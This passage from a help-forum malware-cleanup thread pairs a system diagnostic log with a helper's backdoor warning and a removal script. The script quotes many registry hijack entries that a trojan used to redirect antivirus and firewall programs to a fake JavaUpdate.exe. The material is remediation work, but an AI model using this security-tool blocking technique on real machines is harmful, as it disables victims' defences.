Report Id: c58d8dba-93e7-11e6-8875-60029255fa90

Error: (10/16/2016 05:04:31 PM) (Source: Application Hang) (EventID: 1002) (User: )
Description: The program wmplayer.exe version 12.0.7601.19148 stopped interacting with Windows and was closed. To see if more information about the problem is available, check the problem history in the Action Center control panel.

Process ID: 13e8

Start Time: 01d227f0d9892e7d

Termination Time: 30

Application Path: C:\Program Files\Windows Media Player\wmplayer.exe

Report Id: 2087597f-93e4-11e6-8875-60029255fa90

Error: (10/16/2016 05:04:12 PM) (Source: Application Hang) (EventID: 1002) (User: )
Description: The program wmplayer.exe version 12.0.7601.19148 stopped interacting with Windows and was closed. To see if more information about the problem is available, check the problem history in the Action Center control panel.

Process ID: 1374

Start Time: 01d227f0cd111901

Termination Time: 30

Application Path: C:\Program Files\Windows Media Player\wmplayer.exe

Report Id: 146cdce6-93e4-11e6-8875-60029255fa90

Error: (10/14/2016 08:59:06 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Faulting application name: HitmanPro_x64.exe, version: 3.7.14.280, time stamp: 0x57d93dfa
Faulting module name: HitmanPro_x64.exe, version: 3.7.14.280, time stamp: 0x57d93dfa
Exception code: 0xc0000005
Fault offset: 0x00000000002bef61
Faulting process id: 0x654
Faulting application start time: 0x01d2267f0da0a6ce
Faulting application path: G:\HitmanPro_x64.exe
Faulting module path: G:\HitmanPro_x64.exe
Report Id: 91e03e0e-9272-11e6-b528-c44060154998

Error: (10/14/2016 08:57:16 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Faulting application name: HitmanPro_x64.exe, version: 3.7.14.280, time stamp: 0x57d93dfa
Faulting module name: HitmanPro_x64.exe, version: 3.7.14.280, time stamp: 0x57d93dfa
Exception code: 0xc0000005
Fault offset: 0x00000000002bef61
Faulting process id: 0x4d8
Faulting application start time: 0x01d2267ecd036c7e
Faulting application path: G:\HitmanPro_x64.exe
Faulting module path: G:\HitmanPro_x64.exe
Report Id: 5060e104-9272-11e6-b528-c44060154998

Error: (10/14/2016 08:04:59 PM) (Source: Microsoft-Windows-CAPI2) (EventID: 512) (User: )
Description: The Cryptographic Services service failed to initialize the VSS backup "System Writer" object.

Details:
Could not query the status of the EventSystem service.

System Error:
A system shutdown is in progress.
.

Error: (10/14/2016 08:02:01 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Faulting application name: CMD.EXE, version: 6.1.7601.17514, time stamp: 0x4ce78e2b
Faulting module name: unknown, version: 0.0.0.0, time stamp: 0x00000000
Exception code: 0xc0000005
Fault offset: 0x00000000
Faulting process id: 0x73c
Faulting application start time: 0x01d226774e839f23
Faulting application path: C:\Windows\SysWOW64\CMD.EXE
Faulting module path: unknown
Report Id: 985e74aa-926a-11e6-977c-cdbe39bc9798


System errors:
=============
Error: (10/15/2016 12:42:56 PM) (Source: Disk) (EventID: 11) (User: )
Description: The driver detected a controller error on \Device\Harddisk2\DR9.

Error: (10/15/2016 12:38:09 PM) (Source: Disk) (EventID: 11) (User: )
Description: The driver detected a controller error on \Device\Harddisk2\DR8.

Error: (10/14/2016 09:00:33 PM) (Source: Service Control Manager) (EventID: 7000) (User: )
Description: The MBAMService service failed to start due to the following error:
The system cannot find the file specified.

Error: (10/14/2016 09:00:33 PM) (Source: Service Control Manager) (EventID: 7000) (User: )
Description: The MBAMScheduler service failed to start due to the following error:
The system cannot find the file specified.

Error: (10/14/2016 08:55:47 PM) (Source: Service Control Manager) (EventID: 7001) (User: )
Description: The PnP-X IP Bus Enumerator service depends on the Function Discovery Provider Host service which failed to start because of the following error:
The dependency service or group failed to start.

Error: (10/14/2016 08:55:33 PM) (Source: DCOM) (EventID: 10005) (User: )
Description: DCOM got error "1084" attempting to start the service WSearch with arguments "" in order to run the server:
{9E175B6D-F52A-11D8-B9A5-505054503030}

Error: (10/14/2016 08:55:19 PM) (Source: Service Control Manager) (EventID: 7001) (User: )
Description: The WinHTTP Web Proxy Auto-Discovery Service service depends on the DHCP Client service which failed to start because of the following error:
The dependency service or group failed to start.

Error: (10/14/2016 08:53:47 PM) (Source: Service Control Manager) (EventID: 7026) (User: )
Description: The following boot-start or system-start driver(s) failed to load:
AFD
CSC
DfsC
discache
ElbyCDIO
NetBIOS
NetBT
nsiproxy
Psched
rdbss
spldr
tdx
vwififlt
Wanarpv6
WfpLwf
ws2ifsl

Error: (10/14/2016 08:53:45 PM) (Source: Service Control Manager) (EventID: 7001) (User: )
Description: The Network Location Awareness service depends on the Network Store Interface Service service which failed to start because of the following error:
The dependency service or group failed to start.

Error: (10/14/2016 08:53:45 PM) (Source: Service Control Manager) (EventID: 7001) (User: )
Description: The SMB 2.0 MiniRedirector service depends on the SMB MiniRedirector Wrapper and Engine service which failed to start because of the following error:
The dependency service or group failed to start.


CodeIntegrity:
===================================
  Date: 2014-05-14 20:19:40.671
  Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume14\Windows\explorer.exe because the set of per-page image hashes could not be found on the system.

  Date: 2014-05-14 20:19:40.562
  Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume14\Windows\explorer.exe because the set of per-page image hashes could not be found on the system.

  Date: 2014-05-14 20:19:40.452
  Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume14\Windows\explorer.exe because the set of per-page image hashes could not be found on the system.

  Date: 2014-05-14 20:19:38.955
  Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume14\Windows\explorer.exe because the set of per-page image hashes could not be found on the system.

  Date: 2014-05-14 20:19:38.814
  Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume14\Windows\explorer.exe because the set of per-page image hashes could not be found on the system.

  Date: 2014-05-14 20:19:38.674
  Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume14\Windows\explorer.exe because the set of per-page image hashes could not be found on the system.

  Date: 2014-05-14 20:19:38.518
  Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume14\Windows\explorer.exe because the set of per-page image hashes could not be found on the system.

  Date: 2014-05-14 20:19:38.268
  Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume14\Windows\explorer.exe because the set of per-page image hashes could not be found on the system.

  Date: 2014-05-14 20:19:38.066
  Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume14\Windows\explorer.exe because the set of per-page image hashes could not be found on the system.

  Date: 2013-06-17 11:21:47.370
  Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume1\recovery\recup_dir.4\f0082656.exe because the set of per-page image hashes could not be found on the system.


==================== Memory info ===========================

Processor: Intel® Core™ i3-4130 CPU @ 3.40GHz
Percentage of memory in use: 65%
Total physical RAM: 4000.09 MB
Available physical RAM: 1387.46 MB
Total Virtual: 7998.37 MB
Available Virtual: 5356.86 MB

==================== Drives ================================

Drive c: () (Fixed) (Total:465.66 GB) (Free:79.68 GB) NTFS
Drive e: () (Fixed) (Total:931.51 GB) (Free:153.7 GB) NTFS
Drive z: (System Reserved) (Fixed) (Total:0.1 GB) (Free:0.06 GB) NTFS ==>[system with boot components (obtained from drive)]

==================== MBR & Partition Table ==================

========================================================
Disk: 0 (MBR Code: Windows 7 or 8) (Size: 465.8 GB) (Disk ID: 1BC070FA)
Partition 1: (Active) - (Size=100 MB) - (Type=07 NTFS)
Partition 2: (Not Active) - (Size=465.7 GB) - (Type=07 NTFS)

========================================================
Disk: 1 (Size: 931.5 GB) (Disk ID: 84AEB39B)

Partition: GPT.

==================== End of Addition.txt ============================



#4 TsVk!

TsVk!

    penguin farmer


  • Members
  • 6,234 posts
  • OFFLINE
  •  
  • Gender:Male
  • Location:The Antipodes
  • Local time:03:03 AM

Posted 21 October 2016 - 01:20 AM

Hi jumpman17,

 

 

BACKDOOR WARNING!
 

One or more of the identified infections is a Backdoor Trojan.

This allows hackers to remotely control your computer, steal critical system information and download and execute files.

Though the trojan has been identified and can be killed, because of it's backdoor functionality your PC is very likely compromised and there is no way to be sure your computer can ever again be trusted. Many experts in the security community believe that once infected with this type of trojan the best course of action would be a reformat and reinstall of the OS. Please read these for more information:

How Do I Handle Possible Identify Theft, Internet Fraud and CC Fraud?
When Should I Format, How Should I Reinstall?

 

If you don't want to go that route...

 

If you have done any online banking on the machine in question  I recommend you take steps to preserve your bank account's integrity.

  • contact your bank and check for fraudulent transfers, place your accounts on fraud watch
  • get your credit cards re-issued
  • change all your online passwords, from a different secure computer.

If not, it is still highly recommended that you change your

  • email passwords
  • social networking passwords
  • other sensitive and financial website passwords

from a different secure computer.

 

 

We can still clean this machine but I can't guarantee that it will be 100% secure afterwards. Let me know what you decide to do. If you decide to go through with the cleanup, please proceed with the following steps.

 

--------------------

Torrent Warning!

 

Torrent software often contain malware and other nasties. It's up to you whether you want to run the risk by keeping this software on your machine, but I ask you not to run any torrent transfers until we are finished please.

--------------------

 

i5r8d1.jpg  Please create a new text file located in the same directory as FRST.exe, copy these lines into it and then save it.

HKLM-x32\...\Run: [] => [X]

IFEO: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\3.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\acs.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\AdAwareDesktop.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\AdAwareService.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\AdAwareTray.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\adoronsfirewall.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\AgentSvc.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\alertwall.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\ALMon.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\ALsvc.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\alupdate.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\AntiHook.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\app_firewall.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\apvxdwin.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\armorwall.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\as3pf.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\asr.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\aupdrun.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\authfw.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\avas.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\AvastSvc.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\AvastUi.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\avcom.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\AVK.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\AVKProxy.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\AVKService.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\AVKTray.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\avkwctl.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\AVKWCtlx64.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\avkwctrl.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\avmgma.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\avp.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\avpmapp.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\avtask.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\aws.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\backgroundscanclient.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\Bav.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\bavhm.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\BavSvc.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\BavTray.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\BavUpdater.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\BavWebClient.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\BDSSVC.EXE: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\bgctl.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\bgnt.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\BgScan.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\blackd.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\blackice.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\blinksvc.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\bootsafe.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\BullGuard.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\BullGuardUpdate.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\BullGuarScanner.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\capinfos.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\CavApp.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\cavasm.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\CavAUD.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\CavCons.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\CavEmSrv.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\Cavmr.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\CavMud.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\Cavoar.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\CavQ.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\CavSn.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\CavSub.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\CavUMAS.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\CavUserUpd.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\Cavvl.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\cavwp.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\cdas17.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\cdas2.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\cdinstx.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\CEmRep.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\cis.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\CisTray.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\clamd.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\clamscan.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\ClamTray.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\ClamWin.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\CMain.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\cmdagent.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\cmgrdian.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\configmgr.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\configuresav.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\CONSCTLX.EXE: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\coreFrameworkHost.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\coreServiceShell.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\cpd.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\csi-eui.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\CV.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\DCSUserProt.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\dfw.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\dlservice.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\dltray.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\dragon_updater.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\dumpcap.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\dvpapi.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\dwengine.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\econceal.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\econser.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\editcap.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\ekern.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\ekrn.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\emlproui.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\EMLPROXY.EXE: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\endtaskpro.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\escanmon.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\escanpro.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\espwatch.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\Ethereal.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\fameh32.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\fgui.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\filedeleter.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\filemon.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\firewall.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\firewall2004.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\firewallgui.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\FPAVServer.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\FProtTray.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\FPWin.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\freshclam.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\freshclamwrap.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\fsgk32.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\FSHDLL64.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\fshoster32.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\FSM32.EXE: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\FSMA32.EXE: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\fsorsp.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\fsrt.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\fssm32.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\fwsrv.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\gateway.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\GDKBFltExe32.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\GDSC.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\GDScan.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\GpChromeDatabasegInx64.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\guardxkickoff_x64.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\guardxservice.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\hpf_.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\iface.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\InstLsp.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\invent.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\ipatrol.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\ipcserver.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\ipctray.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\iptray.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\K7AVScan.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\K7CrvSvc.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\K7EmlPxy.EXE: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\K7FWSrvc.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\K7PSSrvc.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\K7RTScan.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\K7SysMon.Exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\K7TSecurity.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\K7TSMain.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\K7TSMngr.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\kav.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\kpf4gui.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\kpf4ss.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\licwiz.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\Lite.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\LittleHook.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\livehelp.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\lookout.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\lpfw.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\mbam.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\mbamscheduler.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\mbamservice.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\mcods.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\MCS-Uninstall.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\MCShieldCCC.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\MCShieldDS.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\MCShieldRTM.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\mcvsescn.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\mergecap.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\MpCmdRun.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\mpf.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\mpfcm.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\MpUXSrv.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\MSASCui.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\msconfig.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\MsMpEng.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\msseces.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\MWAGENT.EXE: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\MWASER.EXE: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\nanoav.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
